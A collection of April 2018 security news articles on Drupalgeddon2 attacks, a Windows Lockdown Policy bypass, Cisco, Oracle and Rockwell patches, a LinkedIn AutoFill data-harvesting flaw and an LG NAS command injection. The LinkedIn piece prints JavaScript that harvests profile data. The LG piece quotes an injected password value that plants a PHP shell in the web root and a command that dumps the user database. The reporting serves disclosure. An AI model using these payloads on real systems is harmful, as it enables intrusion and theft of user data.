According to 360Netlab, at least three threat groups have been exploiting the recently patched vulnerability. The company says some of the Drupalgeddon2 attacks are powered by a relatively large botnet tracked by the company as Muhstik. Experts believe Muhstik is actually a variant of the old Tsunami botnet.

“We noticed one of them has worm-propagation behavior,” 360Netlab wrote in a blog post. “After investigation, we believe this botnet has been active for quit a time. We name it muhstik, for this key word keeps popup in its binary file name and the communication IRC channel.”

Muhstik uses two main propagation methods: the aioscan scanning module, which includes seven scanning-related payloads on four different ports, and an SSH scanning module that looks for systems with weak passwords.

Researchers say the botnet can help malicious actors make a profit by delivering cryptocurrency miners such as XMRig and CGMiner, and by using Muhstik to launch distributed denial-of-service (DDoS) attacks.

Volexity reported last week that one of the Monero miner campaigns appeared to be linked to a cybercrime group that last year exploited a vulnerability in Oracle WebLogic Server (CVE-2017-10271) to infect systems with cryptocurrency malware. GreyNoise Intelligence has confirmed the connection between these attacks.


Google Discloses Windows Lockdown Policy Zero-Day
23.4.2018 securityweek
Vulnerebility

Google Discloses Unpatched Windows Lockdown Policy Bypass

A Windows 10 vulnerability that could bypass Windows Lockdown Policy and result in arbitrary code execution remains unpatched 90 days after Microsoft has been informed on the bug’s existence.

On systems with User Mode Code Integrity (UMCI) enabled, a .NET bug can be exploited to bypass the Windows Lockdown Policy check for COM Class instantiation, security researcher James Forshaw of Google's Project Zero team.

The issue was reproduced on Windows 10S, but is said to impact all Windows 10 versions with UMCI enabled.

The vulnerability, the security researcher explains, resides in the manner in which the WLDP COM Class lockdown policy behaves when a .NET COM object is instantiated.

The policy contains a hardcoded list of 8 to 50 COM objects which enlightened scripting engines can instantiate. Thus, even if one would be able to register an existing DLL under one of the allowed COM CLSIDs, a good implementation should check the CLSID passed to DllGetObject against said internal list, and prevent attacks.

What the security researcher discovered was that, when a .NET COM object is instantiated, the CLSID passed to DllGetClassObject is only used to look up the registration information in HKCR, the CLSID is thrown away, and the .NET object created.

Because of that, an attacker can add registry keys, including to HKCU, to load an arbitrary COM visible class under one of the allowed CLSIDs.

“This has a direct impact on the class policy as it allows an attacker to add registry keys (including to HKCU) that would load an arbitrary COM visible class under one of the allowed CLSIDs. As .NET then doesn’t care about whether the .NET Type has that specific GUID you can use this to bootstrap arbitrary code execution,” the researcher notes.

For a successful exploitation, an attacker could use tools such as Forshaw’s DotNetToJScript, a free tool that allows users to generate a JScript which bootstraps an arbitrary .NET Assembly and class.

Forshaw also published a Proof-of-Concept as two files: an .INF to set-up the registry and a .SCT. The latter is an example built using DotNetToJScript to load an untrusted .NET assembly into memory to display a message box, but it could be used for more than that.

The flaw was reported to Microsoft on January 19, when the company acknowledged the flaw. As per Project Zero’s policy, vendors are given 90 days to patch flaws before they are made public, and Microsoft didn’t meet the deadline for this issue.

The bug, however, isn’t critical, this being one of the main reasons details on it were publicly released.

“This issue was not fixed in April patch Tuesday therefore it's going over deadline. This issue only affects systems with Device Guard enabled (such as Windows 10S) and only serves as a way of getting persistent code execution on such a machine. It's not an issue which can be exploited remotely, nor is it a privilege escalation,” the security researcher explains.

To abuse the flaw, an attacker would require foothold on the impacted machine to install the needed registry entries. A remote code execution flaw in the operating system could be abused for that.

Considering that there are known Device Guard bypasses in the .NET framework that haven’t been fixed and continue to be usable, the security vulnerability is less serious than it would have been if all known avenues for bypass were fixed, Forshaw concludes.


Google Project Zero hacker discloses a Zero-Day in Windows Lockdown Policy
23.4.2018 securityaffairs 
Vulnerebility

Google researcher has publicly disclosed a Windows 10 zero-day that could be exploited by attackers to bypass Windows Lockdown Policy on systems with User Mode Code Integrity (UMCI).
Google has publicly disclosed a Windows 10 zero-day vulnerability that could be exploited by attackers to bypass Windows Lockdown Policy on systems with User Mode Code Integrity (UMCI) enabled and execute arbitrary code on the target system.

Project Zero hacker James Forshaw publicly disclosed the issue because the vulnerability was not fixed in a 90-day period according to the Google disclosure policy.

The zero-day affects all Windows 10 versions with UMCI enabled, Forshaw successfully exploited it on Windows 10S.

“The enlightened Windows Lockdown Policy check for COM Class instantiation can be bypassed by using a bug in .NET leading to arbitrary code execution on a system with UMCI enabled (e.g. Device Guard)” states the security advisory published by Google.

The zero-day flaw ties the way the WLDP COM Class lockdown policy behaves when a .NET COM object is instantiated.

The WLDP COM Class lockdown policy contains a hardcoded list of 8 to 50 COM objects which enlightened scripting engines can instantiate.

In order to prevent an attack, while registering an existing DLL a correct implementation of the policy should check the CLSID passed to DllGetObject against the hardcoded list.

“The WLDP COM Class lockdown policy contains a hardcoded list of 8 to 50 COM objects which enlightened scripting engines can instantiate. Excluding issues related to the looking up of the correct CLSID (such as previously reported abuse of TreatAs case 40189).” continues the analysis.

“This shouldn’t be a major issue even if you can write to the registry to register an existing DLL under one of the allowed COM CLSIDs as a well behaved COM implementation should compare the CLSID passed to DllGetObject against its internal list of known objects.”

Google expert discovered that when a .NET COM object is instantiated, the CLSID passed to mscoree’s DllGetClassObject is only used to look up the registration information in HKCR, the CLSID is thrown away, and the .NET object created.

This means that an attacker can add registry keys, including to HKCU, that would load an arbitrary COM visible class under one of the trusted CLSIDs.

“This has a direct impact on the class policy as it allows an attacker to add registry keys (including to HKCU) that would load an arbitrary COM visible class under one of the allowed CLSIDs. As .NET then doesn’t care about whether the .NET Type has that specific GUID you can use this to bootstrap arbitrary code execution,” continues the analysis.

Windows Lockdown Policy

The Google researcher published a Proof of Concept code for the vulnerability that is composed of two files:

an .INF to set-up the registry.
a .SCT created with the DotNetToJScript free tool that could be used to load an untrusted .NET assembly into memory to display a message box.
The researcher reported the vulnerability to Microsoft on January 19, but the tech giant hasn’t addressed it in 90 days.

“This issue was not fixed in April patch Tuesday therefore it’s going over deadline. This issue only affects systems with Device Guard enabled (such as Windows 10S) and only serves as a way of getting persistent code execution on such a machine. It’s not an issue which can be exploited remotely, nor is it a privilege escalation,” added the expert.

The expert highlighted that attackers need to gain access to the system to exploit the flaw and install registry entries.


CVE-2018-0229 flaw in SAML implementation threatens Firepower, AnyConnect and ASA products
23.4.2018 securityaffairs 
Vulnerebility

Cisco has announced a set of security patches that address the CVE-2018-0229 vulnerability in its implementation of the Security Assertion Markup Language (SAML).
The CVE-2018-0229 flaw could be exploited by an unauthenticated, remote attacker to establish an authenticated AnyConnect session through an affected device running ASA or FTD Software.

“A vulnerability in the implementation of Security Assertion Markup Language (SAML) Single Sign-On (SSO) authentication for Cisco AnyConnect Secure Mobility Client for Desktop Platforms, Cisco Adaptive Security Appliance (ASA) Software, and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to establish an authenticated AnyConnect session through an affected device running ASA or FTD Software.” reads the security advisory published by CISCO.

“The authentication would need to be done by an unsuspecting third party.”

The CVE-2018-0229 flaw affects the following Cisco solutions:

Single sign-on authentication for the AnyConnect desktop mobility client;
Adaptive Security Appliance (ASA) software; and
Firepower Threat Defense (FTD) software.
According to Cisco, the flaw exists because there the ASA or FTD Software doesn’t implement any mechanism to detect that the authentication request originates from the AnyConnect client directly.

An attacker could exploit the CVE-2018-0229 vulnerability by tricking victims into clicking a specifically crafted link and authenticating using the company’s Identity Provider (IdP). In this scenario, the attacker can hijack a valid authentication token and use that to establish and set up an AnyConnect session through an affected device running ASA or FTD Software.

CVE-2018-0229

The flaw affects the Cisco AnyConnect Secure Mobility Client, and ASA Software and FTD Software configured for SAML 2.0-based SSO for AnyConnect Remote Access VPN that is running on the following Cisco products:

3000 Series Industrial Security Appliances (ISA)
ASA 5500 Series Adaptive Security Appliances
ASA 5500-X Series Next-Generation Firewalls
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
Adaptive Security Virtual Appliance (ASAv)
Firepower 2100 Series Security Appliance
Firepower 4100 Series Security Appliance
Firepower 9300 ASA Security Module
FTD Virtual (FTDv)
Cisco confirmed that only ASA software running version 9.7.1 and later are vulnerable, the issue also affects FTD software running version 6.2.1 and later, and AnyConnect version 4.4.00243 and later.


Unpatched Flaw Exposes LG NAS Devices to Remote Attacks
21.4.2018 securityweek
Vulnerebility

Researchers claim hackers can remotely exploit an unpatched command injection vulnerability to take control of network-attached storage (NAS) devices from LG.

VPN specialists at vpnMentor discovered that many LG NAS models are impacted by a flaw that can be exploited without authentication.

According to researchers, the password parameter in the login page is vulnerable to command injection. An attacker can abuse this parameter to execute arbitrary commands, including for adding a new user account and dumping the database containing existing usernames and passwords.

Adding a new username and an associated password hash allows an attacker to log in to the administration interface as an authorized user and access any file stored on the device.

vpnMentor told SecurityWeek that attacks exploiting this flaw can be launched both from the local network and the Internet. The company says it’s difficult to determine exactly how many devices are vulnerable to attacks from the Internet, but it estimates that it’s roughly 50,000.

vpnMentor has randomly tested a majority of LG NAS device models and they appear to be vulnerable. The company says LG uses two types of firmware across all its NAS products and one of them is impacted by this vulnerability.

Proof-of-concept (PoC) code and a video have been made available to demonstrate the vulnerability:

LG has been notified about the security hole, but vpnMentor claims it has not received any response from the tech giant and there is no sign of a patch. SecurityWeek has reached out to LG for comment and will update this article if the company responds.

This is not the first time researchers have found serious vulnerabilities in LG NAS products. A couple of years ago, Hungary-based SEARCH-LAB analyzed LG’s N1A1 product and discovered multiple flaws that could have been leveraged to gain admin access to devices.


A flaw in LinkedIn feature allowed user data harvesting
20.4.2018 securityaffairs
Vulnerebility

The researcher Jack Cable (18) has discovered a vulnerability in LinkedIn, the AutoFill functionality, that allowed user data harvesting.
While experts and people are discussing the Cambridge Analytica case another disconcerting case made the headlines, the private intelligence agency LocalBlox has left unsecured online an AWS bucket containing 48 million records that were also harvested from Facebook, LinkedIn, and Twitter.

No doubt, data harvesting is a common practice and we are only discovering the tip of the iceberg, many companies and intelligence agencies do it for different reasons.

Sometimes this activity is advantaged by security flaws in the features implemented by the social media platforms.

Early April, Mark Zuckerberg admitted public data of its 2.2 billion users has been compromised over the course of several years by third-party actors that gathered information on its users. Third-party scrapers have exploited an issue in the Facebook’s search function that allows anyone to look up users via their email address or phone numbers.

Now the researcher Jack Cable (18) has discovered a flaw in LinkedIn, the AutoFill functionality, that allowed user data harvesting.

The AutoFill functionality allows to quickly fill out forms with data from their LinkedIn profile, including name, title, company, email address, phone number, city, zip code, state, and country.

Cable explained that it is possible to exploit the function to harvest user data by placing the AutoFill button on a malicious website, rather than leaving the LinkedIn button visible on the page the attacker could have changed its properties and locate it everywhere in the page making it invisible.

With this trick, that clearly violates LinkedIn’s privacy policies, when a user would visit the malicious site and click anywhere on the page, it unawares clicks on the invisible AutoFill button, resulting in his LinkedIn data being harvested.

“The potential for exploitation existed until being patched 04/19/18, as any whitelisted website can access this information with a single click.” wrote Cable.

“The exploit flowed as follows:

The user visits the malicious site, which loads the LinkedIn AutoFill button iframe.
The iframe is styled so it takes up the entire page and is invisible to the user.
The user clicks anywhere on the page. LinkedIn interprets this as the AutoFill button being pressed, and sends the information via
postMessage
to the malicious site.
The site harvests the user’s information via the following code:
window.addEventListener("message", receiveMessage, false);

function receiveMessage(event)
{
if (event.origin == 'https://www.linkedin.com') {
let data = JSON.parse(event.data).data;
if (data.email) {
alert('Hi, ' + data.firstname + ' ' + data.lastname + '! Your email is ' + data.email + '. You work at ' + data.company + ' and you live in ' + data.city + ', ' + data.state + '.');
console.log(data);
}
}
console.log(event)
}



Cable pointed out with this trick it is possible to access also non-public data was also provided to a site abusing AutoFill function, even if LinkedIn states in its documentation that only public data is provided to fill out forms.

Cable reported the flaw to LinkedIn on April 9 and the company temporary restricted the AutoFill functionality to whitelisted sites. Of course, the problem was not completely addressed in this way, an attacker that was able to compromise the whitelisted site was still in position to harvest data from LinkedIn.

On April 19, LinkedIn published a stable fix for the issue.

LinkedIn said it is not aware of there had been no evidence of malicious exploitation, but I’m sure that many of view has a different opinion.


LinkedIn Vulnerability Allowed User Data Harvesting
20.4.2018 securityweek
Vulnerebility

LinkedIn recently patched a vulnerability that could have been exploited by malicious websites to harvest data from users’ profiles, including private information.

The flaw affected the AutoFill functionality, which allows websites to offer users the possibility to quickly fill out forms with data from their LinkedIn profile. Users simply click the AutoFill button on a webpage containing a form and some of the fields are pre-populated with data available from LinkedIn, including name, title, company, email address, phone number, city, zip code, state and country.

Jack Cable, an 18-year-old researcher based in Chicago, noticed that this functionality could have been abused to harvest user data by placing the AutoFill button on a malicious site. Rather than leaving the button as provided by LinkedIn, an attacker could have changed its properties to spread it across the entire web page and make it invisible.

Whenever a user would visit the malicious site and click anywhere on the page, they would actually be clicking on the invisible AutoFill button, resulting in their LinkedIn data being harvested by the website.

Cable pointed out that the possibility to launch these types of attacks clearly violated LinkedIn’s policies related to the use of AutoFill. First of all, the social media giant does not allow form field data to be submitted without being seen by the user.

Secondly, while some of the exposed data was publicly accessible on users’ LinkedIn profiles, non-public data was also provided to a site abusing AutoFill. LinkedIn states in its documentation that only public data is used to fill out forms.

Cable reported the vulnerability to LinkedIn on April 9 and a temporary solution that involved restricting the AutoFill functionality to whitelisted sites was rolled out the next day. However, the researcher argued that this fix was incomplete as whitelisted websites still could have collected user data. Furthermore, there was also the possibility of a whitelisted site getting compromised and abused for data harvesting.

LinkedIn rolled out a more permanent fix on April 19. Bleeping Computer reports that users are now prompted whenever their data is being sent to a website via the AutoFill functionality. The social media company said there had been no evidence of malicious exploitation.

While the vulnerability itself is not particularly sophisticated, the existence of such security holes can pose a serious problem to both a company and its customers, as demonstrated by the recent Cambridge Analytica scandal, in which the data of as many as 87 million Facebook users was harvested.

Cable has also reported vulnerabilities to Google, Yahoo, Uber, the U.S. Department of Defense (Hack the Air Force), and many other organizations.


Drupal 8 Updated to Patch Flaw in WYSIWYG Editor
20.4.2018 securityweek
Vulnerebility

Updates released on Wednesday for Drupal 8 patch a moderately critical cross-site scripting (XSS) vulnerability affecting a third-party JavaScript library.

The flaw impacts CKEditor, a WYSIWYG HTML editor included in the Drupal core. CKEditor exposes users to XSS attacks due to a flaw in the Enhanced Image (image2) plugin.

"The vulnerability stemmed from the fact that it was possible to execute XSS inside CKEditor using the <img> tag and specially crafted HTML," said CKEditor developers. "Please note that the default presets (Basic/Standard/Full) do not include this plugin, so you are only at risk if you made a custom build and enabled this plugin."

XSS flaws can typically be exploited by getting the targeted user to click on a specially crafted link, and they allow attackers to execute arbitrary code, leading to session hijacking, data theft or phishing.

The security hole, discovered by Kyaw Min Thein, affects CKEditor versions 4.5.11 through 4.9.1, and it has been fixed with the release of version 4.9.2. The patched version of CKEditor has been included in Drupal 8.5.2 and 8.4.7.

"The Drupal 7.x CKEditor contributed module is not affected if you are running CKEditor module 7.x-1.18 and using CKEditor from the CDN, since it currently uses a version of the CKEditor library that is not vulnerable," Drupal developers explained. "If you installed CKEditor in Drupal 7 using another method (for example with the WYSIWYG module or the CKEditor module with CKEditor locally) and you’re using a version of CKEditor from 4.5.11 up to 4.9.1, update the third-party JavaScript library by downloading CKEditor 4.9.2 from CKEditor's site."

This is the second Drupal security update in recent weeks. The previous update was released in late March and it addressed CVE-2018-7600, a highly critical remote code execution vulnerability that allows attackers to take control of impacted websites.

Dubbed Drupalgeddon2, the flaw has been exploited in the wild to deliver backdoors, cryptocurrency miners, and other types of malware. The first attempts to exploit the vulnerability were spotted in mid-April, shortly after technical details and proof-of-concept (PoC) code were made public.


Cisco Patches Critical Flaws in WebEx, UCS Director
20.4.2018 securityweek
Vulnerebility

Cisco informed customers on Wednesday that it has patched critical vulnerabilities in WebEx and UCS Director, along with nine high severity flaws in StarOS, IOS XR, Firepower and ASA products.

The WebEx vulnerability, tracked as CVE-2018-0112, is interesting because it allows a remote attacker to execute arbitrary code on a targeted user’s system by sending them a specially crafted Flash (.swf) file via the WebEx client’s file sharing capabilities during a meeting.

The flaw, discovered by Alexandros Zacharis of the European Union Agency for Network and Information Security (ENISA), affects WebEx Business Suite clients, WebEx Meetings, and WebEx Meetings Server. Cisco has released software updates that patch the vulnerability.

The Cisco Unified Computing System (UCS) Director product is affected by an information disclosure issue that allows an authenticated attacker to remotely access information on virtual machines in the end-user portal and perform any permitted operations. The issue, identified as CVE-2018-0238, was discovered by Cisco itself and patches are available.

Of the 30 advisories published by Cisco on Wednesday, nine describe high severity flaws, 18 are for medium severity issues, and one is informational.

The high severity vulnerabilities include denial-of-service (DoS) flaws in StarOS, IOS XR software, Firepower Detection Engine and 2100 series appliances, and several Adaptive Security Appliance (ASA) products; a session fixation issue affecting ASA, AnyConnect Secure Mobility, and Firepower Threat Defense (FTD); and an SSL certificate verification bypass bug affecting ASA.

According to Cisco, none of the vulnerabilities disclosed this week have been exploited in the wild. However, it’s important for Cisco customers to patch serious flaws as it’s not uncommon for malicious actors to exploit them in their operations.

Cisco has recently warned customers that the risk of exploitation for an IOS Smart Install vulnerability is high. The vulnerability, CVE-2018-0171, was disclosed recently and a proof-of-concept (PoC) exploit is available.

While this particular flaw has yet to be exploited in attacks, the risk is high due to the fact that Smart Install, along with other Cisco protocols, have been abused in malicious campaigns, including ones conducted by state-sponsored threat actors.


Experts are observing Drupalgeddon2 (CVE-2018-7600) attacks in the wild
20.4.2018 securityaffairs
Vulnerebility

After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub experts started observing attackers using it to deliver backdoors and crypto miners.
At the end of March, the Drupal Security Team confirmed that a “highly critical” vulnerability (dubbed Drupalgeddon2), tracked as CVE-2018-7600, was affecting Drupal 7 and 8 core and announced the availability of security updates on March 28th.

The vulnerability was discovered by the Drupal developers Jasper Mattsson.

Both Drupal 8.3.x and 8.4.x are no more supported, but due to the severity of the flaw, the Drupal Security Team decided to address it with specific security updates and experts called it Drupalgeddon2.

Drupal development team released the security update in time to address CVE-2018-7600.

After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes,” experts started observing bad actors attempting to exploit the flaw.

drupalgeddon2

A week after the release of the security update, the experts at security firm Check Point along with Drupal experts at Dofinity analyzed the CMS to analyzed the Drupalgeddon2 vulnerability and published a technical report on the flaw.

After the publication of the report. the expert Vitalii Rudnykh shared a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes.”

Immediately after the disclosure of the PoC, security experts started observing bad actors attempting to exploit the flaw.

Over the weekend, several security firms observed threat actors have started exploiting the flaw to install malware on the vulnerable websites, mainly cryptocurrency miners.

The experts at the SANS Internet Storm Center reported several attacks delivering a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl.

“Pretty much as soon as the exploit became publicly available, our honeypots started seeing attacks that used the exploit.” reads the analysis published by the SANS.
“Ever since then, we are seeing waves of exploit attempts hitting our honeypots.”

A thread on SANS ISC Infosec forums confirms that attackers are exploiting the Drupalgeddon2 flaw to install the XMRig Monero miner. Attackers also use to drop and execute other payloads, including a script to kill competing miners on the infected system.

According to the analysis published by experts at security firm Volexity, threat actors are exploiting the Drupalgeddon2 flaw to deliver malicious scripts cryptocurrency miners and backdoors.

The experts associated one of the observed campaigns aimed to deliver XMRig with a cybercriminal gang that exploited the vulnerability (CVE-2017-10271) in Oracle WebLogic servers to deliver cryptocurrency miners in late 2017.

According to security experts at Imperva, 90% of the Drupalgeddon2 attacks are scanning activities, 3% are backdoor infection attempts, and 2% are attempting to run drop cryptocurrency miners on the vulnerable systems.

“To this point, we have seen 90% of the attack attempts are scanners, 3% are backdoor infection attempts, and 2% are attempts to run crypto miners on the targets.” states the analysis published Imperva.

“Also, most of the attacks originated from the US (53%) and China (45%) “

drupalgeddon2

While experts speculate that the number of attacks could continue to increase in the next weeks, site admins must update their CMS to Drupal 7.58 or Drupal 8.5.1.


Hacking Cisco WebEx with a malicious Flash file. Patch it now!
20.4.2018 securityaffairs
Vulnerebility

Cisco issues a critical patch to address a remote code execution vulnerability in the Cisco WebEx software, hurry up apply it now!
Cisco has issued a critical patch to fix a serious vulnerability (CVE-2018-0112) in its WebEx software that could be exploited by remote attackers to execute arbitrary code on target machines via weaponized Flash files.

The vulnerability affects both client and server versions of WebEx Business Suite or WebEx Meetings. Cisco urges its users to update their software to fix the problem.

“A vulnerability in Cisco WebEx Business Suite clients, Cisco WebEx Meetings, and Cisco WebEx Meetings Server could allow an authenticated, remote attacker to execute arbitrary code on a targeted system.” reads the security advisory published by Cisco.

“The vulnerability is due to insufficient input validation by the Cisco WebEx clients. An attacker could exploit this vulnerability by providing meeting attendees with a malicious Flash (.swf) file via the file-sharing capabilities of the client. Exploitation of this vulnerability could allow arbitrary code execution on the system of a targeted user.”

The flaw has received a CVSS score of 9.0 and was rated as a ‘critical’ severity issue by Cisco.

cisco webex

The vulnerability was reported by the ENISA security expert Alexandros Zacharis of ENISA, it is due to insufficient input validation by the Cisco WebEx clients.

Zacharis discovered that an attacker could submit a malicious Flash file (.swf ) to a room full of attendees using the file sharing feature, then trigger the flaw to execute arbitrary code.

Cisco has already released software updates that fix the flaw, it confirmed that is not aware of any attacks exploiting the vulnerability in the wild.

Cisco added that currently there is no workaround to address the problem.

WebEx Business Suite software should be updated to the versions T32.10 and T31.23.2, while WebEx Meetings client software should be updated to T32.10 and Meetings Server should be updated to 2.8 MR2.

To determine whether a Cisco WebEx meeting application is running a flawed version of the WebEx client build, users can access their Cisco WebEx meeting site and go to the Support > Downloads section.


Rockwell Automation Allen-Bradley Stratix and ArmorStratix switches are exposed to hack due to Cisco IOS flaws
20.4.2018 securityaffairs
Vulnerebility

Rockwell Automation is warning that its Allen-Bradley Stratix and ArmorStratix industrial switches are exposed to hack due to security vulnerabilities in Cisco IOS.
According to Rockwell Automation, eight flaws recently discovered recently in Cisco IOS are affecting its products which are used in many sectors, including the critical manufacturing and energy.

The list of flaws includes improper input validation, resource management errors, 7PK errors, improper restriction of operations within the bounds of a memory buffer, use of externally-controlled format string.

“Successful exploitation of these vulnerabilities could result in loss of availability, confidentiality, and/or integrity caused by memory exhaustion, module restart, information corruption, and/or information exposure.” reads the security advisory published by the US ICS-CERT.

Affected models are Stratix 5400, 5410, 5700, 8000 and ArmorStratix 5700 switches running firmware version 15.2(6)E0a and earlier.

Rockwell Automation Stratix 5400

The most critical vulnerability is the Cisco CVE-2018-0171 Smart Install, a flaw that affects the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software that could be exploited by an unauthenticated, remote attacker to cause a reload of a vulnerable device or to execute arbitrary code on an affected device.

A couple of weeks ago, the hacking crew “JHT” launched a hacking campaign exploiting Cisco CVE-2018-0171 flaw against network infrastructure in Russia and Iran.

Rockwell has released firmware version 15.2(6)E1 to address the vulnerabilities in its switches.

Rockwell Automation provided mitigations in addition to upgrading the software version:

Cisco has released new Snort Rules at https://www.cisco.com/web/software/286271056/117258/sf-rules-2018-03-29-new.html(link is external) to help address the following vulnerabilities:

CVE-2018-0171 – Snort Rule 46096 and 46097
CVE-2018-0156 – Snort Rule 41725
CVE-2018-0174 – Snort Rule 46120
CVE-2018-0172 – Snort Rule 46104
CVE-2018-0173 – Snort Rule 46119
CVE-2018-0158 – Snort Rule 46110


A flaw could allow easy hack of LG Network-attached storage devices
19.4.2018 securityweek 
Vulnerebility

Network-attached storage devices manufactured by LG Electronics are affected by a critical remote code execution vulnerability that could be exploited by attackers to gain full control of the devices.
The experts at the security firm VPN Mentor found a pre-auth remote command injection vulnerability that affects the majority of LG NAS device models.

“we found a way to hack into the system using a pre-authenticated remote command injection vulnerability, which can then allow us to do virtually everything including access the data and tamper with the user data and content.” states the blog post published by VPN Mentor.

“The vulnerability is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices.”

LG Network-attached storage

The flaw ties the improper validation of the “password” parameter of the user login page for remote management, this means that a remote attacker can pass arbitrary system commands through this field.

“As we show in the video, you cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter (you have to use an interceptor like burp). We can simply trigger this bug by adding to it.” continues the analysis.

“To add a new user, we can simply write a persistent shell called c.php by using:

;echo “” > /tmp/x2;sudo mv /tmp/x2 /var/www/c.php

Entering it as a password exploits the vulnerability.

Then, by passing the following command, we can “dump” the users:

echo “.dump user” | sqlite3 /etc/nas/db/share.db"

The experts explained that it is quite simple to dump all database data and add a new user. The experts noticed that LG uses the MD5 hash algorithm to protect passwords, this means that they can be easily cracked.

Below a video PoC of the hack that shows how to exploit the vulnerability to establish a shell on the vulnerable Network-attached storage device and use it to execute commands.

LG has not yet released a security update to address the flaw, for this reason, if you are using LG NAS devices do not expose them on the Internet and protect them with a firewall that will allow only connection from authorized IPs.

Users are also recommended to periodically look out for any suspicious activity by checking all registered usernames and passwords on their devices.

Let me suggest also to periodically check all registered users to detect any anomaly.

A few weeks ago, experts at VPN Mentor disclosed several issued in popular VPN services.


Rockwell Automation Switches Exposed to Attacks by Cisco IOS Flaws
18.4.2018 securityweek 
Vulnerebility

Rockwell Automation informed customers this week that its Allen-Bradley Stratix and ArmorStratix industrial switches are exposed to remote attacks due to vulnerabilities in Cisco’s IOS software.

Allen-Bradley Stratix and ArmorStratix switches, which are used in the critical manufacturing, energy and other sectors, rely on Cisco’s IOS software for secure integration with enterprise networks. Rockwell Automation has determined that eight flaws discovered recently in Cisco IOS also affect its own products.Cisco IOS vulnerabilities impact Allen-Bradley Stratix industrial switches

Cisco IOS vulnerabilities impact Allen-Bradley Stratix industrial switches

According to Rockwell and ICS-CERT, Stratix 5400, 5410, 5700, 8000 and ArmorStratix 5700 switches running firmware version 15.2(6)E0a and earlier are impacted by critical and high severity vulnerabilities that can be exploited remotely and without authentication for denial-of-service (DoS) attacks and arbitrary code execution.

The issues include CVE-2018-0171, a critical remote code execution flaw in the Smart Install feature that can be exploited to take complete control of vulnerable devices. The Smart Install protocol has been abused in many attacks over the past years, including by state-sponsored threat groups, and Cisco has warned that malicious actors may start exploiting CVE-2018-0171 as well.

Rockwell has released firmware version 15.2(6)E1 to address the vulnerabilities in the aforementioned switches.

The vendor also informed organizations using Allen-Bradley Stratix 5900 Services Routers with version 15.6.3M1 and earlier of the firmware that four of the Cisco IOS vulnerabilities impact these devices.

Rockwell has not released any firmware updates for this device and instead advised users to implement mitigations.

The company and ICS-CERT have also published advisories describing the impact of the eight Cisco IOS flaws on Allen-Bradley Stratix 8300 Industrial Managed Ethernet Switches with firmware versions 15.2(4a)EA5 and earlier. Mitigations have been made available for these switches as well.


Oracle Patches 254 Flaws With April 2018 Update
18.4.2018 securityweek 
Vulnerebility

Oracle’s Critical Patch Update (CPU) for April 2018 contains 254 new security fixes, 153 of which address vulnerabilities in business-critical applications.

A total of 19 products received security updates in this CPU, including E-Business Suite, Fusion Middleware, Financial Services Applications, Java SE, MySQL, PeopleSoft, Retail Applications, and Sun Systems Products Suite. Nearly half of the bugs are remotely exploitable.

Forty-two of the security holes addressed this month were assessed with a Critical severity rating, with the most severe of them featuring a CVSS score of 9.8. Affected products include Fusion Middleware, Financial Services, PeopleSoft, EBS, and Retail Applications.

Fusion Middleware received 39 patches, the largest number an Oracle product received this month. Thirty of the vulnerabilities may be remotely exploitable without authentication, the software giant explains in its advisory.

Next in line comes Financial Services Applications, with 36 vulnerabilities patched (18 of which may be remotely exploitable without authentication), followed by MySQL at 33 flaws (2 remotely exploitable) and Retail Applications at 31 bugs (27 remotely exploitable).

Oracle also released patches for Java SE (14 vulnerabilities – 12 remotely exploitable without authentication), Sun Systems Products Suite (14 issues – 3 remotely exploitable), Hospitality Applications (13 – 4), Virtualization (13 – 3), E-Business Suite (12 – 11), PeopleSoft (12 – 8), and Enterprise Manager Products Suite (10 – 8).

Other affected products include Communications Applications (9 vulnerabilities, 6 of which may be exploited remotely) Supply Chain Products Suite (5 – 3), Construction and Engineering Suite (4 – 2), JD Edwards Products (3 – 3), Siebel CRM (2 – 1), Database Server ( 2 – 0), Support Tools (1 – 0), and Utilities Applications (1 – 1).

Overall, 153 of the patches Oracle released this month target vulnerabilities affecting crucial business applications: PeopleSoft, E-Business Suite, Fusion Middleware, Retail, JD Edwards, Siebel CRM, Financial Services, Hospitality Applications, and Supply Chain.

Around 69% of the issues may be exploited remotely without entering credentials, ERPScan, which specializes in securing Oracle and SAP applications, notes. The firm also points out that Oracle has 110,000 application customers from various industries, which “makes it of the utmost importance to apply the released security patches.”

One of the most critical vulnerabilities addressed this month is CVE-2018-7489, which features a CVSS Base Score of 9.8. The issue allows an unauthenticated attacker with network access to take over the vulnerable component.

The vulnerability impacts multiple components of Oracle Financial Services Applications including Risk Measurement and Management, Hedge Management and IFRS Valuations, and Analytical Applications Infrastructure.

Another critical issue resolved in this Oracle CPU is CVE-2018-2628 (CVSS Base Score: 9.8), which impacts the WebLogic Server component of Fusion Middleware and can be exploited by an attacker with network access via the T3 transport protocol.

Other critical issues include CVE-2017-5645 (CVSS Base Score: 9.8), impacting the JD Edwards World Security component of JD Edwards Products, and CVE-2017-5645 (CVSS Base Score: 9.8), impacting the Retail Order Management System component of Retail Applications. Attackers successfully exploiting the bugs could gain full control over the impacted components.


Experts warn threat actors are scanning the web for Drupal installs vulnerable to Drupalgeddon2
14.4.2018 securityaffairs
Vulnerebility

After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes,” experts started observing bad actors attempting to exploit the flaw.
At the end of March, the Drupal Security Team confirmed that a “highly critical” vulnerability (dubbed Drupalgeddon2), tracked as CVE-2018-7600, was affecting Drupal 7 and 8 core and announced the availability of security updates on March 28th.

The vulnerability was discovered by the Drupal developers Jasper Mattsson.

Both Drupal 8.3.x and 8.4.x are no more supported, but due to the severity of the flaw, the Drupal Security Team decided to address it with specific security updates and experts called it Drupalgeddon2.

Drupal development team released the security update in time to address CVE-2018-7600.

drupalgeddon2

A week after the release of the security update, a proof-of-concept (PoC) exploit was publicly disclosed.

The experts at security firm Check Point along with Drupal experts at Dofinity analyzed the CMS to analyzed the Drupalgeddon2 vulnerability and published a technical report on the flaw.

“In brief, Drupal had insufficient input sanitation on Form API (FAPI) AJAX requests. As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication.” reads the analysis.

